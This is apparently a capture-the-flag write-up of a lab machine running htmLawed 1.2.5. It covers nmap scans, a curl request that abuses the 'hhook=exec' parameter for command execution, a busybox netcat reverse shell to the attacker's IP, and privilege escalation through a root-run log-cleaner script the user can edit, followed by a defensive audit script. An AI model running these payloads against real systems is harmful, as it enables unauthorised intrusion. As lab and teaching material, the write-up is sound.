law
2025-3-27
Date
Mar 26, 2025 → Mar 26, 2025
Tag
Nmap
Web Exploitation
Privilege Escalation Techniques

192.168.108.190

Nmap

└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT
Nmap scan report for 192.168.108.190
Host is up (0.059s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 14.62 seconds

└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:46 EDT
Warning: 192.168.108.190 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.108.190
Host is up (0.066s latency).
All 65535 scanned ports on 192.168.108.190 are in ignored states.
Not shown: 65386 open|filtered udp ports (no-response), 149 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 145.48 seconds

└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 01:48 EDT
Nmap scan report for 192.168.108.190
Host is up (0.056s latency).
Not shown: 65466 closed tcp ports (reset), 67 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: htmLawed (1.2.5) test
|_http-server-header: Apache/2.4.56 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.49 seconds

22

nothing found

80

Change the curl command to use our IP and command:
curl -s -d "sid=foo&hhook=exec&text=whoami" -b "sid=foo" http://192.168.108.190/
busybox nc 192.168.45.160 4444 -e /bin/bash
got in

PE

Move linpeas.sh to the target machine.
We found a script that cleans something, so let's take a look.
So it is a log cleaner.
We also don't have permission to look at the log file, so I guess the script is executed by root. Since the script was added by the current user, let's try adding a PE command to it.
After adding it, we got root permission.
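The root cause of this PE step is a script that root executes but an unprivileged user owns and can edit. As an added example (not part of the original writeup), here is a defender's audit in shell that flags such files; the function names, the TRUSTED_UID variable and the use of GNU stat are assumptions.

```shell
#!/bin/sh
# Added example: audit files that a root job (cron, systemd timer) executes.
# A finding means an unprivileged account can change what root will run.
# TRUSTED_UID is the only owner accepted; it defaults to 0 (root).

# check_path PATH: print a finding and return 1 if PATH is unsafe.
check_path() {
    cp_owner=$(stat -c '%u' -- "$1") || return 2   # GNU stat assumed
    cp_mode=$(stat -c '%a' -- "$1") || return 2
    cp_rc=0
    if [ "$cp_owner" -ne "${TRUSTED_UID:-0}" ]; then
        echo "UNSAFE $1: owned by uid $cp_owner"
        cp_rc=1
    fi
    # 022 (octal) masks the group-write and other-write bits.
    if [ $(( 0$cp_mode & 022 )) -ne 0 ]; then
        echo "UNSAFE $1: mode $cp_mode is group- or world-writable"
        cp_rc=1
    fi
    return "$cp_rc"
}

# audit_root_script FILE: check the script and the directory holding it,
# because write access to the directory lets a user replace the file.
# Directories higher up the path deserve the same check.
audit_root_script() {
    ars_rc=0
    check_path "$1" || ars_rc=1
    check_path "$(dirname -- "$1")" || ars_rc=1
    return "$ars_rc"
}

# Stand-alone use: sh audit.sh /path/to/script ...
audit_rc=0
for audit_file in "$@"; do
    audit_root_script "$audit_file" || audit_rc=1
done
[ "$audit_rc" -eq 0 ]
```

Run it as root against every script path referenced by root's scheduled jobs; any UNSAFE line is a file to re-own to root and chmod to 755 or stricter.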
 